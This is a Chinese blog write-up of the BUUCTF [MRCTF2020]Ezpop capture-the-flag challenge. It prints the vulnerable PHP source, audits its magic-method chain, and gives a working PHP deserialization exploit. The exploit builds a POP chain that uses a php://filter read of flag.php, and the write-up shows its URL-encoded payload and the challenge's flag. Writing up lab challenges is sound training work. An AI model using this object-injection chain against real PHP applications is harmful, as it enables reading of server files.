BUUCTF [MRCTF2020]Ezpop

最新推荐文章于 2023-01-01 10:30:06 发布
最新推荐文章于 2023-01-01 10:30:06 发布
阅读量245 收藏 1
点赞数
分类专栏: web 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52671379/article/details/123887235
版权

BUUCTF [MRCTF2020]Ezpop

题目

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){//在类的对象被调用为函数时候,自动被调用
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){//在类的对象实例化之前,自动被调用
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){//在类的对象被当作字符串操作的时候,自动被调用
        return $this->str->source;
    }

    public function __wakeup(){//在类的对象反序列化的时候,自动被调用
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){//在类的对象实例化之前,自动被调用
        $this->p = array();
    }

    public function __get($key){//从不可访问的属性中读取数据会触发
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

代码审计

flag在flag.php中
include($value)文件包含
应该可以执行文件包含flag.php,就要调用append($value)方法
要调用append($value)方法,就需要调用__invoke()魔术方法
接着要想调用__invoke(),那么就需要将Modifier类的对象调用为函数
$var值传给了$value参数,所以要包含flag.php的源码,就是给$var传入php://filter/read=convert.base64-encode/recource=flag.php

在Test类中有两个魔法函数__construct和__get,需要关注魔法函数__get。魔法函数__get中设置了属性p会被当做函数调用,刚好符合前面Modifier类中的要求

Show类中有三个魔术方法,__toString中会return属性str中的属性source,但要是source属性不存在,就符合了Test类中的要求,魔术方法__toString在类被当做一个字符串处理时会被自动调用,而__wakeup则将属性source传入正则匹配函数preg_match()中,在这个函数中source属性就被当做字符串处理,匹配一些字符串。__wakeup又在类被反序列化时自动调用。

if(isset($_GET['pop'])){//如果GET传参pop,进行反序列化
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

1.GET传参pop触发反序列化unserialize()

2.unserialize()触发__wakeup()魔术方法

3.__wakeup()通过preg_match()将$this->source做字符串比较,如果$this->source是Show类,触发__toString()魔术方法

4.__toString中的str赋值为一个实例化的Test类,那么其类不含有source属性,所以会触发Test中的__get()魔术方法

5.__get()中的p赋值为Modifier类,那么相当于Modifier类被当作函数处理,所以会触发Modifier类中的__invoke()魔术方法

6.__invoke()调用append方法中的include()进行文件包含,
所以pop应该构造为:
unserialize()–>__wakeup()–>toString()–>__get()–>__invoke()–>append()–>include(flag.php)

那反过来就是

<?php
class Modifier {
    protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';
}
class Show{
    public $source;
    public $str;
}
class Test{
    public $p;
}
$m=new Modifier();
$s=new Show();
$t=new Test();
$t->p=$m;
$s->str=$t;
$s->source=$s;
echo urlencode(serialize($s));
?>

输出:

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7D

so payload:

GET:?O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7D

得到base64编码的flag.php源码

PD9waHAKY2xhc3MgRmxhZ3sKICAgIHByaXZhdGUgJGZsYWc9ICJmbGFnezViMDQ3NjJkLWMzNDUtNDEzMi1iYjkzLWQyYTlmNjE2ZDYzNX0iOwp9CmVjaG8gIkhlbHAgTWUgRmluZCBGTEFHISI7Cj8+
老young可爱
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctfMRCTF2020-Ezpop小白详解
m0_73860001的博客
03-15 927
真的很详细
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
[MRCTF2020]Ezpop
FUCKING12的博客
01-01 195
先创建2个show对象a,b,在最后反序列化的时候$a=new Show()会调用__wakeup()函数,此时a->source是b,b此时是一个Show()对象,就会调用b里面__toString()方法,此时b里面的str是Test()对象,Test()对象没有source变量,便会调用Test()里面的__get()方法,将Test()类里面的p创建为Modifier(),然后就会调用Modifier()里面的__invoke()方法,执行append()函数,实现文件执行的功能。
MRCTF2020」- Ezpop
ro4lsc的博客
05-14 2392
MRCTF2020」- Ezpop 做了一个星期的反序列化,不知道为啥,概念从模糊到清晰再到模糊,看来还是基础不扎实导致的,所以就有了这一篇文章的诞生,思路的一个整理以及POP链的构造需要再熟悉熟悉 俗话说的好,有ez的题目都不ez,那么这个题同样也不ez 重新复习一下php里面反序列化序列化的几大魔术方法 __destruct(类执行完毕以后调用,其最主要的作用是拿来做垃圾回收机制。) __construct(类一执行就开始调用,其作用是拿来初始化一些值。) __toString(在对象当做字符串的
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
BUUCTF部分web题目
最新发布
05-06
写题记录
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
MRCTF2020 Ezpop
Tajang的大千世界
07-10 499
打开靶机,哇,直接给源码 这道题的知识点是利用php魔术方法的相互关联,构造pop链,其实有的地方没太懂,群里Y1ng大佬还回复我了,好兴奋,这题他的wp也看过,接下来就按我的理解写 知道我对这道题理解多么蠢吗?简直蠢得不可理喻,我以为代码审计,读懂代码会和上次绕过一样的类型,后来证明我真的蠢,给大家看看我的代码审计 我是真得蠢。。。不说了,先来讲一波php魔术方法 __construct 当一个对象创建时被调用, __toString 当一个对象被当作一个字符串被调用。 __wakeup
MRCTF2020 web Ezpop_Revenge 简单记录
a3320315的博客
03-31 2996
题目介绍 首先这是一个typecho的框架 然后通过扫目录得到www.zip源码泄露,然后就是审计代码了~~ 解题过程 首先我们找到输入点 在插件中,我们发现action()的代码 这儿需要说明一下,这儿的action一般是自动加载的,当路由加载类是会自动加载某个函数,所以我们直接搜索这个类得名称~~ Helper::addRoute("page_admin_action","/page_a...
[MRCTF2020] - Web
qtL0ng的博客
07-01 1037
[MRCTF2020]套娃 打开题目查看源码 <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b
[MRCTF2020]Ezpop—序列化pop链
weixin_43952190的博客
05-09 6589
Ezpop 序列化Pop链 利用几个类之间相互关联进行构造 文件包含漏洞 Modifier类中append函数使用了include(),会出现文件包含漏洞。 以下是题目内容: Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%
CTF/CTF练习平台-welcome to bugkuctf【php://filter及php://input】
热门推荐
Sp4rkW的博客
09-01 3万+
原题内容: http://120.24.86.145:8006/test1/ 首先bp一下,可见提示源码: &lt;!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&amp;&amp;(file_get_contents($...
(续更)PHP反序化漏洞解析(4) 简单pop反序化链的构造 (通过魔法函数)学习过程 [MRCTF2020]Ezpop 详细复现过程
AAAAAAAAAAAA66的博客
12-22 1019
想我一个月之前还说的要日更php反序化的知识的,结果第三章鸽了两天,这第四章倒好,直接鸽一个月。中间因为学的太慢去搞别的方向了,现在终于有了时间来整治这x蛋的php反序化链了。 --------------------------------------------------------------------------------------------------------------------------------- 引子 现在CTF一般都会考反序化题目,熟练掌握反序化漏洞,不至于
BUUCTF - Web - [MRCTF2020]Ezpop
1tachi的博客
11-30 395
题目源码 <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected $var; public function append(
BUUCTF】[MRCTF2020]Ezpop
aoao331198的博客
06-03 539
一道pop链的问题,反序列化漏洞进阶 思路如下 声明一个类,会调用方法 我们让也是一个类,则会调用其方法 我们接下来让是一个类,其没有属性,则会调用方法 我们最后让是类,就会执行方法,同时注意最核心的方法中有函数,可以使用php伪协议读文件 pop链构造依次如下 最后exp如下 最后总结使用到的魔法函数的知识...
[MRCTF2020]Ezpop 1
shinygod的博客
03-28 1348
知识点:各种魔术方法,以及构造反序列化pop链子的思路 <?php //flag is in flag.php class Modifier { protected $var="php://filter/resource=flag.php"; public function append($value){ include($value);//漏洞利用点 } public function __invoke(){ //在类被当作函数调用
buuctf misc [MRCTF2020]ezmisc 1
05-16
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。 题目描述: There are some problems to solve! Each problem corresponds to a flag. Please submit the flags to get your points! 解题思路: 这道题目是一个较为简单的misc题目,我们需要在给定的文本中找到flag,每个flag对应一个问题。比如说,第一个flag对应的问题是: What is the capital of China? 在文本中找到答案"Beijing"即可得到对应的flag。 其他的问题和答案大概率也可以在文本中找到,需要稍微仔细一些,比如有一些问题是需要计算的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值